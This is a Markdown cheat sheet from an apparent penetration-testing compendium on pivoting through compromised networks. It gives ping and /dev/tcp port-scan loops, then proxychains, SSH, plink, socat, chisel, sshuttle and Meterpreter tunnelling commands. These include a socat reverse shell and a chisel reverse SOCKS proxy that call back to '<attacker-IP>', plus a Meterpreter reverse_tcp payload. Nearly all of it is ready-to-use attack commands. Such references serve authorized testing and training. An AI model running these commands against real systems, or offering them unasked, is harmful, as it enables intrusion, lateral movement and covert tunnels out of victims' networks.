killchain-compendium/pivoting.md

152 lines
3.9 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Pivoting
* Tunnelling/Proxying
* Port Forwarding
## Enumeration
### Using material found on the machine and preinstalled tools
* `arp -a`
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
```
* Using local tools through a proxy like `nmap`
## Tools
### Enumerating a network using native and statically compiled tools
### Proxychains / FoxyProxy
2021-09-08 02:09:14 +02:00
* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server
2021-08-23 01:13:54 +02:00
```sh
proxychains nc <IP> <PORT>
2021-09-08 02:09:14 +02:00
proychains nmap <IP>
2021-08-23 01:13:54 +02:00
```
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
```
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
2021-09-08 02:09:14 +02:00
#socks5 127.0.0.1 1337
2021-08-23 01:13:54 +02:00
# proxy_dns
```
* FoxyProxy
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
```sh
ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
```
* Dynamic Port Forwarding
```sh
ssh -D <Port> <user>@<Jumpserver> -fN
```
* Reverse Proxy
```sh
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
```
### plink.exe (Windows)
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
```sh
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
```
* Key generation
```sh
puttygen <keyfile> -o key.ppk
```
### Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell
```sh
sudo nc -lvnp 443
```
* Relay via Jumpserver
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
### Chisel
* **Does not require SSH on target**
* Reverse Proxy
* Bind port on attacker
```sh
./chisel server -p <ListeningPort> --reverse &
```
* Reverse port on target/proxy
```sh
./chisel client <attacker-IP>:<attacker-Port> R:socks &
```
* `proxychains.conf` contains
```sh
[ProxyList]
socks5 127.0.0.1 <Listening-Port>
```
* Forward SOCKS Proxy
* Proxy/compromised machine
```sh
./chisel server -p <Listen-Port> --socks5
```
* On attacker
```sh
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
```
* Remote Port Forward
* On attacker
```sh
./chisel server -p <Listen-Port> --reverse &
```
* On forwarder
```sh
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
```
* Local Port Forwarding
* On proxy
```sh
./chisel server -p <Listen-Port>
```
* On attacker
```sh
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
```
### sshuttle
* `pip install sshuttle`
* `sshuttle -r <user>@<target> <subnet/CIDR>`
* or automatically determined
```sh
sshuttle -r <user>@<target> -N
```
* Key based auth
```sh
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
```
* Exclude servers via `-x`, for example the target/gateway server
2021-11-18 18:05:21 +01:00
### Meterpreter
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```